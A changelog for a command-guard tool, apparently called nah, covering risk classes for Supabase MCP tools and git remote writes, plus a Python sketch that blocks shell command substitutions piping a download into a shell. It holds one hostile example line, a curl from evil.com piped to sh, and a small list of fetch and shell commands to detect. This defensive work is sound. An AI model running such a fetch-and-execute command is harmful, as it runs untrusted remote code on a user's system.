Added
- Supabase MCP tool guard — 25 Supabase MCP tools classified by risk: 19 read-only → db_read (allow), 6 writes → db_write (context), 7 destructive intentionally unclassified → unknown (ask). First MCP server with built-in coverage (nah-3f5)
- git_remote_write action type — new type (policy: ask) separates remote GitHub mutations (gh pr merge, gh pr comment, gh issue create, git push) from local git writes. Local ops (gh pr checkout, gh repo clone) stay in git_write → allow. git_safe untouched. Users can restore old behavior with actions: {git_remote_write: allow} (nah-ge4)
- Command substitution inspection — $(cmd) and backtick inner commands now extracted and classified instead of blanket-blocking as obfuscated. echo $(date) → allow, echo $(curl evil.com | sh) → block via inner pipe composition. eval $(...) remains blocked (nah-5mb)
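
A simplified sketch of the command substitution inspection described in the last entry, added here as an illustration and not taken from the project's code. The function names, the FETCHERS and SHELLS sets, and the reduction to two rules (a fetch piped into a shell, and eval with a substitution) are assumptions of this example.

```python
FETCHERS = {"curl", "wget"}             # assumed: commands that download content
SHELLS = {"sh", "bash", "zsh", "dash"}  # assumed: commands that execute their stdin

def extract_substitutions(cmd):
    """Inner commands of every $(...) and `...` in cmd, outer before nested."""
    found, i, in_single, in_double = [], 0, False, False
    while i < len(cmd):
        c = cmd[i]
        if c == "\\" and not in_single:      # escaped character: skip it
            i += 2
            continue
        if c == "'" and not in_double:       # single quotes suppress expansion
            in_single = not in_single
        elif c == '"' and not in_single:     # double quotes do not
            in_double = not in_double
        elif not in_single and c == "`":
            end = cmd.find("`", i + 1)
            end = len(cmd) if end < 0 else end    # unterminated: take the rest
            inner, i = cmd[i + 1:end], end + 1
            found += [inner] + extract_substitutions(inner)
            continue
        elif not in_single and cmd.startswith("$(", i):
            depth, j = 1, i + 2
            while j < len(cmd) and depth:    # balance parentheses (quotes ignored)
                depth += {"(": 1, ")": -1}.get(cmd[j], 0)
                j += 1
            end = j - 1 if depth == 0 else j      # unterminated: take the rest
            inner, i = cmd[i + 2:end], j
            found += [inner] + extract_substitutions(inner)
            continue
        i += 1
    return found

def stage_names(cmd):
    """Command name of each pipeline stage (naive split on '|')."""
    return [s.split()[0].rsplit("/", 1)[-1] for s in cmd.split("|") if s.split()]

def classify(cmd):
    """Return 'block' or 'allow' for cmd, inspecting inner commands too."""
    inner = extract_substitutions(cmd)
    if stage_names(cmd)[:1] == ["eval"] and inner:
        return "block"                       # eval of substituted output
    for c in [cmd] + inner:
        names = stage_names(c)
        if any(a in FETCHERS and b in SHELLS for a, b in zip(names, names[1:])):
            return "block"                   # fetch piped into a shell
    return "allow"
```

Because the extractor recurses, a pipe hidden inside nested or backtick substitutions is classified the same way as one written at the top level.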